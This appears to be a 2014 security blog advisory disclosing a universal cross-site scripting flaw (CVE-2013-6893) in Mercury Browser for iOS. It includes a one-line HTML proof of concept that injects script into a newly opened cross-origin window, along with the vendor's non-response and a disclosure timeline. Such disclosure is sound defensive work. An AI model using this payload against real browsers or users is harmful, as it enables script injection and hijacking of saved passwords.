Tuesday, June 10, 2014

[CVE-2013-6893] Mercury Browser for iOS - Universal Cross-Site Scripting

# Vulnerability: Mercury Browser for iOS - Universal Cross-Site Scripting
# Software Link: https://itunes.apple.com/pl/app/mercury-web-browser/id331012646
# Vulnerable versions: at least 8.1 and newer (not tested on previous versions)
# CVE: CVE-2013-6893
# Author: Lukasz Pilorz
# http://browser-shredders.blogspot.com

1. Vulnerability

Mercury Browser for iOS is vulnerable to Universal Cross-Site Scripting attacks, including the possibility to hijack passwords saved by the browser.

2. Proof of Concept

<button onclick="w=window.open('http://example.com');w.document.write('<script>alert(location)</script>');">Click</button>

3. Fix

No response from the vendor, no fix issued. The vulnerability is partially mitigated by popup blocker not allowing to open new tabs if the user does not whitelist target domain (bypassable with redirects).

4. Timeline

02.12.2013 - initial contact, no response

18.12.2013 - proof-of-concept for UXSS and password hijacking sent, no response
30.05.2014 - public disclosure

No comments:

Post a Comment